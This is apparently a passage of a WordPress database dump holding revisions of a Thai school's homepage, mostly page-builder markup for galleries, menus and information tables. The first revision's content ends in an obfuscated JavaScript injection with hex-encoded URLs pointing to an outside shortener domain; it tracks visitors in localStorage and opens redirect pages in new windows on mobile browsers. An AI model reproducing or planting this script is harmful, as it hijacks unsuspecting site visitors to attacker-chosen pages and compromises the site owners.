_0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-06 13:19:59','2024-08-06 06:19:59','',14,'http://pakhaeng.ssk.in.th/?p=550',0,'revision','',0),
(552,1,'2024-08-06 13:24:56','2024-08-06 06:24:56','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลสิ่งก่อสร้าง</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 